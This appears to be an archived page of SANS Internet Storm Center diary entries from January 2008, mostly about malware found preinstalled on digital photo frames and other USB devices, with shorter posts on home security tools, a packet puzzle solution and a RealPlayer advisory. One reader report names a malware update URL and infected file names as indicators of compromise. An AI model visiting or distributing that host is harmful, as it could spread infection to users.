We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.


Swa Frantzen -- Gorilla Security


Published: 2008-01-07

Digital Hitchhikers Part Three

Back on Christmas Day we published a diary about digital picture frames being purchased with malware installed on the built-in memory.  Last Friday we did a follow-up diary after two more readers wrote to tell us that they also purchased malware-infected photo frames.  In the second diary we asked readers to check any recently purchased devices that connect to a user's computer via a USB cable and appear to the operating system as a mounted drive.  In years past this would have been limited to iPods and USB memory sticks but now it includes digital photo frames, GPS devices, external hard drives, and of course digital cameras.

Several readers wrote back with their findings and here's what they told us.

An reader who asked to remain anonymous said:  

I got bought a set of MP3 playing sunglasses for Christmas that came with an extra gift, infection, AVG called it PSW.OnlineGames. It was a hidden .scr file with a hidden Autorun.inf file .. Can't remember the name of the file or who sold it off-hand though since I'm not near my Inbox..

I got in contact with the company that sold the device and they responded and investigated very quickly.. Seems something went wrong in China during Quality Control checks..

Seems that the Christmas rush is a logical time to distribute infected devices.. Everyone'll be so keen to plug them in and go, and those who run unprotected get it good.

Reader Paul said:

The dairy entries discussing the malware on digital photo frames and GPS units have been interesting and informative, but I believe that they have neglected to mention mitigation. In the cases mentioned with any detail, the infection was started when autorun.inf launched a trojan exe file. The key bit of information I believe should be included in a subsequent update is that infection can be prevented by disabling the autorun feature in Windows.

Paul (and others), see this timely article on Microsoft's TechNet about a technique known as Island Hopping.  While the article focuses on USB memory sticks and media you get at trade booths the defensive measures are applicable to protecting Windows from any external device that mounts as a drive..

Josef sent us this note: 

I am currently working on an Incident within my company that seems to show obvious similarities with your Photo Frame malware incidents:

A virus that copies itself to all partitions (also removables) and writes itself to the AUTORUN.INF

If it is truly connected to your incidents, your AUTORUN.INF files should show the following lines:


It also tries to update itself from a website (www.max-gate.com/backup/mitm.com), connects to an IRC server and tries to spread via NetBIOS.

Reader David sent us this good advice: 

I just wanted to mention that if a malicious program locks down certain features of your operating system, it may still be possible to load an alternate OS (e.g. Knoppix) off CD and delete the offending content.  I believe the latest Linux tools can interact with a fair degree of safety with NTFS formatted systems.

Many users may be unaware of this option, so I just thought it might be worth noting.

Reader Craig pointed out the obvious question:  was the item "new" or had it been returned and resold: 

One fact that seems to be omitted from most of the reports I hear about picture frames, CF storage, MP3 Players, etc that show up with either a virus or porn on them is this: Whether the packages where sealed when item was purchased.

One of my students (who works at a large electronics store) has mentioned that it seems to be a common prank.  That he has seen cases where people have bought a device, loaded stuff on it, and then returned it.   And if they tell the customer representative that there was nothing wrong with the device, they just changed their mind often the device ends up right back out on the shelves with the new devices.  He told me that employees are not instructed or required to wipe content off the storage device before reselling the item or putting it back on the shelves.

Craig, as far as we know all of the cases were with "new" items - but to be fair, many stores will re-shrinkwrap returned items if the customer tells the return personnel that they brought it back because the didn't want it (rather than it being defective.)  That opens up the opportunity for somebody to buy an item, bring it home, load malware, then return it the store where it might get resold.

Reader Dave did the right thing when he brought his infected drive back: 

I purchased a 250GB Maxtor External One Touch Backup from Radio Shack (sale item!) and though it was shrink-wrapped, it caused my Mcafee AV to throttle up on two systems, and blue screen one of them. 

I exchanged it, and the new unit has worked perfectly. I did enclose a note with the drive, and had the sales clerk write "DO NOT RESELL - DEFECTIVE" all over the box.

Handler Scott Fendley provided this little vignette: 

I heard of a story in Colorado where an MP3 player had been purchased for Christmas which contained XXX stuff on it.  So it appears that this is truly a new prank that retailers are going to have to address.

Finally, SANS ISC Handler Daniel Weseman went back through his case logs for the past several weeks and found a couple of reports from his office:  

We had one case of  a "picture frame" on December 12. Symantec AV triggered on "autorun.inf" and flagged it as "Trojan Horse", so it was probably the Silly worm. On the "what happened" self declaration form, the user stated that he had gotten the picture frame at a christmas raffle of his sports club .. no telling if it was Wal-Mart. I followed up, the user doesn't have it anymore, after our IT support cleaned it and gave it back to the user, the user apparently got rid of it right at the next raffle he went to :)

We had one case of GPS on Dec 20, a Garmin Nuvi, but this wasn't straight out of the box and had been attached to the user's home PC prior.  At least this is what the case log indicates ("user copied MP3 files onto the nuvi at home")

Daniel's analysis of these two cases is that unless somebody has a virus alert right after unpacking a device and plugging it in for the very first time, chances are they picked the badies up somewhere else.

Readers, if you find any more infections - particularly digital photo frames - please let us know via our contact form.  Tell us the name of the device, where you bought it, and what day.  With your permission we'll pass the information along to the equipment manufacturer or to the store's computer security response team.

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2008-01-06

Tools for the Home User

Since Christmas has come and gone, I'm sure we have many more new computers that have made their debut on the internet.  I have gotten asked over and over again by friends and family what they can do to make their home system or small home office more safe and to be aware of what is happening. 

In light of this, I thought a diary might be the way to go in order to solicit and compile an updated list of good tools that folks can put to good use.  If you have something that you use or have used that you think would be worthy of mentioning, please drop us a line and I'll compile a list. 

To start things off, I wanted to point to a tool called PacketProtector that was recently featured on Linux.com and provides some nice features for protecting your wireless home network.  PacketProtector is a Linux distribution for your wireless router.  Here are a list of the features that you get according to their website:

--a stateful firewall (iptables)
--WPA/WPA2 Enterprise wireless (802.1X and PEAP with FreeRADIUS)
--intrusion prevention (Snort-inline)
--remote access VPN (OpenVPN)
--content filtering/parental controls (DansGuardian)
--web antivirus (DG + ClamAV)
--a local certificate authority (OpenSSL)
--secure management interfaces (SSH and HTTPS)
--advanced firewall scripts for blocking IM and P2P apps
--IP spoofing prevention (Linux rp_filter)
--basic protocol anomaly detection (ipt_unclean)

This is a nice addition without having to add any other computers to your network if you don't want/need to.  If you have tried it (I haven't as of yet but I hope to do so in the very near future), please let me know your thoughts such as ease of use etc.  I'll try to compile that as well.


Published: 2008-01-06

Solution: Christmas Packet Challenge

I want to thank everyone for the responses to the Christmas Packet Challenge.  I'm glad everyone enjoyed them.  I sincerely hope to do more of these this  year if  time permits. I learned a lot from the responses myself such as there are different versions to the story "A Christmas Carol" and the  questions required Google and Wikipedia searches for folks who are not from the US:>) I want to post the solution to the challenge and then post the names of those who submitted correct answers. Many folks chose not to have their names listed. If I missed someone, please accept my apologies and drop me a line.  I'll update the list!  Thanks again for playing and I hope everyone has a wonderful new year!!

The starter packet contained the following Base64 encoded question:

In the movie A Christmas Carol, how many night(s) did the three spirits come to visit?
The Answer was 1 night  so the next question is in Packet 1 of the xmas_challenge_2007.pcap

Here are the rest of the questions and answers to the challenge:

**All I want for Christmas is my ____ Front Teeth.  Answer is 2 so the next question is in Packet 2
**How many reindeer have names that begin with the letter "D"?  Answer is 3 so the next question is in Packet 3
**How many reindeer pull Santa's sleigh?  Answer is 9 so the next question is in Packet 9 (Yes I counted Rudolph)
**How many pipers piping did my true love give to me?  Answer is 11 so the next question is in Packet 11
**How many days in the song the ___ Days of Christmas?  Answer is 12 so the next question is in Packet 12
**Of the 365 days in year, what number is Christmas Day?  Answer is 359 so the next question starts in Packet 359 and continues through packet 365 for the message from the handlers (Only a couple of folks pointed out that I had the flags set  to match the holiday spirit of things i.e. xmas tree:>)  Also this data was not Base64 encoded but rather required a conversion from ASCII Decimal to get:

We wish you a Merry Christmas,
We wish you a Merry Christmas,
We wish you a Merry Christmas and a Happy New Year!!!


Thanks again to ALL those who submitted the correct answers!  Till next time...

Clif Bratcher
Kenny Long and Michael Brown
Chris Rohlf
Charles Hamby
Brandon Applegate
Faisal Sehbai
Matt Johnson
Vikas Taneja
John Mark
Stefan Ford
Peter Abromitis
Andre DiMino
CS Lee and Hazrul Hamzah
Joseph Kern
Eric Paynter and wife
Matt Carlson
Christian Gueco
Dan Roberts
Eduardo Tongson
Mario De Tore
Stéphane Adamiak
Morgan Bailey


Published: 2008-01-05

New resource for Reverse Engineering

dELTA wrote to tell us about the release of "The Collaborative RCE Tool Library" which he explains as:
"In very few words, the design goal of this project is to leverage the advantages of the wiki architecture, where everybody can contribute, while at the same time ditching all the disadvantages of the wiki architecture, add just enough moderation, and finally bring the world one step closer to the nirvana of the semantic web."


The site is very cool and worth checking out. We're also looking forward to the library of infosec tools that he says is going to be his project for 2008.


Published: 2008-01-04

Realplayer Vulnerability

Good morning everyone,

Earlier this week, Evgeny Legerov reported a vulnerability involving Real Player which could allow an attacker to execute code on victim computers. At this moment in time, there is no patch or other work around for this vulnerability though I would expect that limiting end-user privileges would limit the potential risk.

Until an update is available, I recommend that you limit viewing multimedia content using Real Player.  It would be worthwhile to plan to add this future update into the mix with any operating system updates which are scheduled to be released soon.

For more information on this vulnerability, please see:



Published: 2008-01-04

Digital Hitchhikers Part Two

Several days ago David Goldsmith posted a diary concerning a digital photo frame that came with a value added feature.  Since then, two more readers have sent us notes concerning malware on digital photo frames that were purchased or received as Christmas presents last week.  We've been in contact with the security team of the retail store chain where they were purchased as well as the product vendor and both swear that no malware is on the units they are selling.

So, dear readers, here is your first project for the New Year.  If you either purchased or were given a digital photo frame, GPS unit for your car, external hard drive, or any other device that connects to your computer via a USB cable and appears to your operating system as one or more mounted drives, please let us know via our contact form if you experienced any suspicious behavior that smells like malware.  To give you an idea of what we are talking about, here are edited excerpts from the three notes we have received so far:

First notification. 

Behavior after attaching the USB digital photo frame to the PC:

1. MSCONFIG would not run - it would briefly open and then terminate

2. Blue screen when starting in safe mode

3. Many antivirus websites would result in browser terminating

4. Various popups for random name.exe "not valid image messages"

Using the CA AV2008 product, a new aggressive virus named Win/32Mocmex.AM was found on the photo frame (filename: kwjkpww.exe ). No detailed info on it is listed yet in their database.  (More information was later available at http://www.prevx.com/filenames/394470622808329496-0/KAWDHZY.DLL.html.)

Second notification.

The attached file is from a digital picture frame. This file was originally named "autorun.inf", was marked as a hidden, system file, and was located along-side the sample pictures shipped with the picture frame.  The program file launched by this autorun was deleted, but is a variant of the trojan Win32/Agent virus. This file was also marked as hidden.

It did appear all seals were intact and the product was carefully wrapped when it was unpacked. However, I can't say for sure that this frame was not a victim of a prior connection.
The virus scanner I'm using tagged the virus .exe file "cfhskjn.exe" as shown in this log entry:

Threat Name:


Detection Date and Time:

1/1/2008 4:23 PM

File Name:


Threat Severity:


Threat Category:


Threat found by On Demand Scan:


Threat Status:


so I'm thinking it was not the autorun.inf worm or "silly worm" as described in this link. Although I've not dug into this particular .exe code that was found on this frame, the classification as a Win32/Agent threat tells me it is not of a worm (self-propagating) type and behaves more as a Trojan threat.
Google-ing the name of the virus executable turns up three Chinese-language links. Using the Google-translate function, you get this web page from the first link:
which tells me this virus has been in circulation since at least Oct 30 of 2007.

Third notification.

I too connected a digital picture frame to my computer and received the nastiest virus that I've ever encounterd in my 20 plus year I/T career. The product vendor tells me it's not true however I know exactly what, how and when. The virus absolutely came from the frame. Is there any way to cooberate this?

This virus was indeed on the frame. It propagates to any connected device by copying a script, a com file and an autorun file. It hides all systems files and itself while completely eliminating the user admin ability to show hidden files. It creates processes that negate any attempt to go to anti virus and anti spam web sites. It prevents the remote installation of any anti virus components. I was able to remove it by using the attrib command to unhide then delete the files, then run Symantec anti virus. I also manually deleted the files from my USB drive and and flash drive that I used to back up my data. I then had to long format and rebuild my computer because I had no trust that it was safe.

I was using my computer the morning that it crashed without any troubles at all. I web mailed, VPN connected to my business network which is FDA regulatory compliant and very secure. When I completed my work I then connected the picture frame and my system immediately went crazy. After this happened I ceased to use my system and went to a second computer where I your publication that re-enforced my immediate conclusion.

By the way, I also received a digital photo frame for Christmas but have not had any problems with it other than the resolution totally sucks.  But that's a subject of another diary some day.  The GPS unit I bought in November mounts as a drive letter in Windows but it too had no malware on it.  We are pretty certain that this is not a wide-spread problem but we need to know if others have experienced anything like this.  Please use our contact form to report any observed malware-like behavior in any of these external devices you recently purchased or received as gifts.  Please be sure to include information about the model name, where you bought it, and if you've been in contact with the store or product vendor.  We'll provide a summary in a few days with details on what was reported.

Many thanks to readers Edd, Larry, and Rick for bringing this issue to our attention.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-03

What's on your to-do list?

It's the time of the year that everyone (ok, some people) look forward to the fresh start the new year brings and have hope for the projects they want to accomplish during the year.

If you have any big projects coming up that are somehow unique or at least have a different twist, drop us a line and I'll publish the ones that seem interesting.

-Christopher Carboni

Handler On Duty



Published: 2008-01-02

McAfee falsing on some JavaScripts

Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance.

The problem is with the McAfee AV.

McAfee just released an Emergency DAT to fix the false on some JavaScripts, detecting as JS/Exploit-BO on virus database  (DAT file) 5197 released today.

The new DAT just released is 5198 and the url to download it is:


Pedro Bueno (pbueno //&& // isc. sans. org )


Published: 2008-01-01

New Year ...................New "Security" Resolutions

Every year do you keep promising to lose weight, quit smoking and save more money? And every year do you break your resolutions by January 15th? Well this year let’s resolve to make some changes that really count. Let’s make our networks and computers more secure. We’re making a list and checking it twice. Here is my list of things to make sure to do in 2008:

  1. Make sure every computer is patched to the latest operating system update.
  2. Make sure every computer is running updated anti-virus programs.
  3. Check your systems for spyware regularly.
  4. Institute a Security Awareness Program and keep it updated and lively.
  5. Attend at least one Security Training event this year, online or in person.
  6. Make your homepage count, set it to SANS Internet Storm Center to keep up with the latest security issues.

Send your suggestions here.

Fair Winds in 2008,